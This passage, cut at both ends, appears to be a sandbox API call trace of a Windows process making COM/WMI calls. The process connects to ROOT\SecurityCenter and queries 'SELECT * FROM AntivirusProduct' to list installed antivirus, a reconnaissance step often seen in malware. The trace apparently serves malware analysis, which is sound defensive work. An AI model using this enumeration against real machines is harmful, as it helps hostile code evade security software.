Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec9c | out: ppvObject=0x19ec9c*=0x54ba318) returned 0x0 [0266.153] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec58 | out: ppvObject=0x19ec58*=0x0) returned 0x80004002 [0266.153] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e84c | out: ppvObject=0x19e84c*=0x0) returned 0x80004002 [0266.153] WbemLocator:IUnknown:AddRef (This=0x54ba318) returned 0x3 [0266.153] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5b4 | out: ppvObject=0x19e5b4*=0x0) returned 0x80004002 [0266.153] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e564 | out: ppvObject=0x19e564*=0x0) returned 0x80004002 [0266.153] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e570 | out: ppvObject=0x19e570*=0x0) returned 0x80004002 [0266.153] CoGetContextToken (in: pToken=0x19e5d0 | out: pToken=0x19e5d0) returned 0x0 [0266.154] CoGetContextToken (in: pToken=0x19e9d8 | out: pToken=0x19e9d8) returned 0x0 [0266.154] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea68 | out: ppvObject=0x19ea68*=0x0) returned 0x80004002 [0266.154] WbemLocator:IUnknown:Release (This=0x54ba318) returned 0x2 [0266.154] WbemLocator:IUnknown:Release (This=0x54ba318) returned 0x1 [0266.154] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0266.154] CoGetContextToken (in: pToken=0x19efa8 | out: pToken=0x19efa8) returned 0x0 [0266.154] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x19f078*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f074 | out: ppvObject=0x19f074*=0x54ba318) returned 0x0 [0266.154] WbemLocator:IUnknown:AddRef (This=0x54ba318) returned 0x3 [0266.154] WbemLocator:IUnknown:Release (This=0x54ba318) returned 0x2 [0266.154] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55426d0, puCount=0x19f20c | out: puCount=0x19f20c*=0x2) returned 0x0 [0266.154] WbemDefPath:IWbemPath:GetText (in: This=0x55426d0, lFlags=8, puBuffLength=0x19f208*=0x0, pszText=0x0 | out: puBuffLength=0x19f208*=0x18, pszText=0x0) returned 0x0 [0266.154] WbemDefPath:IWbemPath:GetText (in: This=0x55426d0, lFlags=8, puBuffLength=0x19f208*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f208*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.155] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f0d0 | out: ppv=0x19f0d0*=0x54ba2e8) returned 0x0 [0266.155] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba2e8, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f178 | out: ppNamespace=0x19f178*=0x67f220) returned 0x0 [0266.197] WbemLocator:IUnknown:QueryInterface (in: This=0x67f220, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f000 | out: ppvObject=0x19f000*=0x66f24c) returned 0x0 [0266.197] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66f24c, pProxy=0x67f220, pAuthnSvc=0x19f050, pAuthzSvc=0x19f04c, pServerPrincName=0x19f044, pAuthnLevel=0x19f048, pImpLevel=0x19f038, pAuthInfo=0x19f03c, pCapabilites=0x19f040 | out: pAuthnSvc=0x19f050*=0xa, pAuthzSvc=0x19f04c*=0x0, pServerPrincName=0x19f044, pAuthnLevel=0x19f048*=0x6, pImpLevel=0x19f038*=0x2, pAuthInfo=0x19f03c, pCapabilites=0x19f040*=0x1) returned 0x0 [0266.197] WbemLocator:IUnknown:Release (This=0x66f24c) returned 0x1 [0266.197] WbemLocator:IUnknown:QueryInterface (in: This=0x67f220, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff4 | out: ppvObject=0x19eff4*=0x66f270) returned 0x0 [0266.198] WbemLocator:IUnknown:QueryInterface (in: This=0x67f220, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff0 | out: ppvObject=0x19eff0*=0x66f24c) returned 0x0 [0266.198] WbemLocator:IClientSecurity:SetBlanket (This=0x66f24c, pProxy=0x67f220, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.198] WbemLocator:IUnknown:Release (This=0x66f24c) returned 0x2 [0266.198] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x1 [0266.198] CoTaskMemFree (pv=0x54bc208) [0266.198] WbemLocator:IUnknown:Release (This=0x54ba2e8) returned 0x0 [0266.199] WbemLocator:IUnknown:QueryInterface (in: This=0x67f220, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebf0 | out: ppvObject=0x19ebf0*=0x66f270) returned 0x0 [0266.199] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebac | out: ppvObject=0x19ebac*=0x0) returned 0x80004002 [0266.199] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9cc | out: ppvObject=0x19e9cc*=0x0) returned 0x80004002 [0266.200] WbemLocator:IUnknown:QueryInterface (in: This=0x67f220, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7a4 | out: ppvObject=0x19e7a4*=0x0) returned 0x80004002 [0266.201] WbemLocator:IUnknown:AddRef (This=0x66f270) returned 0x3 [0266.201] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e50c | out: ppvObject=0x19e50c*=0x0) returned 0x80004002 [0266.201] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4bc | out: ppvObject=0x19e4bc*=0x0) returned 0x80004002 [0266.201] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4c8 | out: ppvObject=0x19e4c8*=0x66f1cc) returned 0x0 [0266.201] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f1cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4d0 | out: pCid=0x19e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.201] WbemLocator:IUnknown:Release (This=0x66f1cc) returned 0x3 [0266.201] CoGetContextToken (in: pToken=0x19e528 | out: pToken=0x19e528) returned 0x0 [0266.201] CoGetContextToken (in: pToken=0x19e930 | out: pToken=0x19e930) returned 0x0 [0266.201] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9c0 | out: ppvObject=0x19e9c0*=0x66f254) returned 0x0 [0266.202] WbemLocator:IRpcOptions:Query (in: This=0x66f254, pPrx=0x66f270, dwProperty=2, pdwValue=0x19e9e8 | out: pdwValue=0x19e9e8) returned 0x80004002 [0266.202] WbemLocator:IUnknown:Release (This=0x66f254) returned 0x3 [0266.202] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x2 [0266.202] CoGetContextToken (in: pToken=0x19ef00 | out: pToken=0x19ef00) returned 0x0 [0266.202] CoGetContextToken (in: pToken=0x19ee60 | out: pToken=0x19ee60) returned 0x0 [0266.202] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x19ef30*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef2c | out: ppvObject=0x19ef2c*=0x67f220) returned 0x0 [0266.202] WbemLocator:IUnknown:AddRef (This=0x67f220) returned 0x4 [0266.202] WbemLocator:IUnknown:Release (This=0x67f220) returned 0x3 [0266.202] WbemLocator:IUnknown:Release (This=0x67f220) returned 0x2 [0266.202] SysStringLen (param_1=0x0) returned 0x0 [0266.203] CoGetContextToken (in: pToken=0x19ef10 | out: pToken=0x19ef10) returned 0x0 [0266.203] WbemLocator:IUnknown:AddRef (This=0x66f270) returned 0x3 [0266.203] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eda4 | out: ppvObject=0x19eda4*=0x66f270) returned 0x0 [0266.203] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x3 [0266.203] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x2 [0266.203] CoGetContextToken (in: pToken=0x19f008 | out: pToken=0x19f008) returned 0x0 [0266.203] WbemLocator:IUnknown:AddRef (This=0x67f220) returned 0x3 [0266.203] IWbemServices:ExecQuery (in: This=0x67f220, strQueryLanguage="WQL", strQuery="SELECT * FROM AntivirusProduct", lFlags=16, pCtx=0x0, ppEnum=0x19f214 | out: ppEnum=0x19f214*=0x663528) returned 0x0 [0266.238] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f078 | out: ppvObject=0x19f078*=0x66352c) returned 0x0 [0266.238] IClientSecurity:QueryBlanket (in: This=0x66352c, pProxy=0x663528, pAuthnSvc=0x19f0c8, pAuthzSvc=0x19f0c4, pServerPrincName=0x19f0bc, pAuthnLevel=0x19f0c0, pImpLevel=0x19f0b0, pAuthInfo=0x19f0b4, pCapabilites=0x19f0b8 | out: pAuthnSvc=0x19f0c8*=0xa, pAuthzSvc=0x19f0c4*=0x0, pServerPrincName=0x19f0bc, pAuthnLevel=0x19f0c0*=0x6, pImpLevel=0x19f0b0*=0x2, pAuthInfo=0x19f0b4, pCapabilites=0x19f0b8*=0x1) returned 0x0 [0266.238] IUnknown:Release (This=0x66352c) returned 0x1 [0266.238] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f06c | out: ppvObject=0x19f06c*=0x66f870) returned 0x0 [0266.239] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x66352c) returned 0x0 [0266.239] IClientSecurity:SetBlanket (This=0x66352c, pProxy=0x663528, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.253] IUnknown:Release (This=0x66352c) returned 0x2 [0266.253] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0266.253] CoTaskMemFree (pv=0x54bc328) [0266.253] IUnknown:QueryInterface (in: This=0x663528, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec64 | out: ppvObject=0x19ec64*=0x66f870) returned 0x0 [0266.254] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec20 | out: ppvObject=0x19ec20*=0x0) returned 0x80004002 [0266.254] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x0) returned 0x80004002 [0266.255] IUnknown:QueryInterface (in: This=0x663528, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0266.255] WbemLocator:IUnknown:AddRef (This=0x66f870) returned 0x3 [0266.255] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e57c | out: ppvObject=0x19e57c*=0x0) returned 0x80004002 [0266.255] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e52c | out: ppvObject=0x19e52c*=0x0) returned 0x80004002 [0266.256] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e538 | out: ppvObject=0x19e538*=0x66f7cc) returned 0x0 [0266.256] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f7cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e540 | out: pCid=0x19e540*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.256] WbemLocator:IUnknown:Release (This=0x66f7cc) returned 0x3 [0266.256] CoGetContextToken (in: pToken=0x19e598 | out: pToken=0x19e598) returned 0x0 [0266.256] CoGetContextToken (in: pToken=0x19e9a0 | out: pToken=0x19e9a0) returned 0x0 [0266.256] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea30 | out: ppvObject=0x19ea30*=0x66f854) returned 0x0 [0266.256] WbemLocator:IRpcOptions:Query (in: This=0x66f854, pPrx=0x66f870, dwProperty=2, pdwValue=0x19ea58 | out: pdwValue=0x19ea58) returned 0x80004002 [0266.256] WbemLocator:IUnknown:Release (This=0x66f854) returned 0x3 [0266.256] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x2 [0266.256] CoGetContextToken (in: pToken=0x19ef78 | out: pToken=0x19ef78) returned 0x0 [0266.256] CoGetContextToken (in: pToken=0x19eed8 | out: pToken=0x19eed8) returned 0x0 [0266.256] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x19efa8*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19efa4 | out: ppvObject=0x19efa4*=0x663528) returned 0x0 [0266.257] IUnknown:AddRef (This=0x663528) returned 0x4 [0266.257] IUnknown:Release (This=0x663528) returned 0x3 [0266.257] IUnknown:Release (This=0x663528) returned 0x2 [0266.257] WbemLocator:IUnknown:Release (This=0x67f220) returned 0x2 [0266.257] SysStringLen (param_1=0x0) returned 0x0 [0266.257] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55426d0, puCount=0x19f260 | out: puCount=0x19f260*=0x2) returned 0x0 [0266.257] WbemDefPath:IWbemPath:GetText (in: This=0x55426d0, lFlags=4, puBuffLength=0x19f25c*=0x0, pszText=0x0 | out: puBuffLength=0x19f25c*=0x18, pszText=0x0) returned 0x0 [0266.257] WbemDefPath:IWbemPath:GetText (in: This=0x55426d0, lFlags=4, puBuffLength=0x19f25c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f25c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.257] CoGetContextToken (in: pToken=0x19f0b0 | out: pToken=0x19f0b0) returned 0x0 [0266.257] IUnknown:AddRef (This=0x663528) returned 0x3 [0266.257] IEnumWbemClassObject:Clone (in: This=0x663528, ppEnum=0x19f26c | out: ppEnum=0x19f26c*=0x663398) returned 0x0 [0266.262] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f130 | out: ppvObject=0x19f130*=0x66339c) returned 0x0 [0266.262] IClientSecurity:QueryBlanket (in: This=0x66339c, pProxy=0x663398, pAuthnSvc=0x19f180, pAuthzSvc=0x19f17c, pServerPrincName=0x19f174, pAuthnLevel=0x19f178, pImpLevel=0x19f168, pAuthInfo=0x19f16c, pCapabilites=0x19f170 | out: pAuthnSvc=0x19f180*=0xa, pAuthzSvc=0x19f17c*=0x0, pServerPrincName=0x19f174, pAuthnLevel=0x19f178*=0x6, pImpLevel=0x19f168*=0x2, pAuthInfo=0x19f16c, pCapabilites=0x19f170*=0x1) returned 0x0 [0266.262] IUnknown:Release (This=0x66339c) returned 0x1 [0266.262] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f124 | out: ppvObject=0x19f124*=0x66fe70) returned 0x0 [0266.262] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f120 | out: ppvObject=0x19f120*=0x66339c) returned 0x0 [0266.262] IClientSecurity:SetBlanket (This=0x66339c, pProxy=0x663398, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.264] IUnknown:Release (This=0x66339c) returned 0x2 [0266.264] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x1 [0266.264] CoTaskMemFree (pv=0x54bc4d8) [0266.264] IUnknown:QueryInterface (in: This=0x663398, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x66fe70) returned 0x0 [0266.264] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ecc8 | out: ppvObject=0x19ecc8*=0x0) returned 0x80004002 [0266.264] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x0) returned 0x80004002 [0266.265] IUnknown:QueryInterface (in: This=0x663398, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e8bc | out: ppvObject=0x19e8bc*=0x0) returned 0x80004002 [0266.265] WbemLocator:IUnknown:AddRef (This=0x66fe70) returned 0x3 [0266.265] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e624 | out: ppvObject=0x19e624*=0x0) returned 0x80004002 [0266.265] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0266.266] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5e0 | out: ppvObject=0x19e5e0*=0x66fdcc) returned 0x0 [0266.266] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fdcc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5e8 | out: pCid=0x19e5e8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.266] WbemLocator:IUnknown:Release (This=0x66fdcc) returned 0x3 [0266.266] CoGetContextToken (in: pToken=0x19e640 | out: pToken=0x19e640) returned 0x0 [0266.266] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0 [0266.266] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ead8 | out: ppvObject=0x19ead8*=0x66fe54) returned 0x0 [0266.266] WbemLocator:IRpcOptions:Query (in: This=0x66fe54, pPrx=0x66fe70, dwProperty=2, pdwValue=0x19eb00 | out: pdwValue=0x19eb00) returned 0x80004002 [0266.266] WbemLocator:IUnknown:Release (This=0x66fe54) returned 0x3 [0266.266] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x2 [0266.266] CoGetContextToken (in: pToken=0x19f020 | out: pToken=0x19f020) returned 0x0 [0266.266] CoGetContextToken (in: pToken=0x19ef80 | out: pToken=0x19ef80) returned 0x0 [0266.266] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x19f050*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f04c | out: ppvObject=0x19f04c*=0x663398) returned 0x0 [0266.266] IUnknown:AddRef (This=0x663398) returned 0x4 [0266.267] IUnknown:Release (This=0x663398) returned 0x3 [0266.267] IUnknown:Release (This=0x663398) returned 0x2 [0266.267] IUnknown:Release (This=0x663528) returned 0x2 [0266.267] SysStringLen (param_1=0x0) returned 0x0 [0266.267] IEnumWbemClassObject:Reset (This=0x663398) returned 0x0 [0266.268] 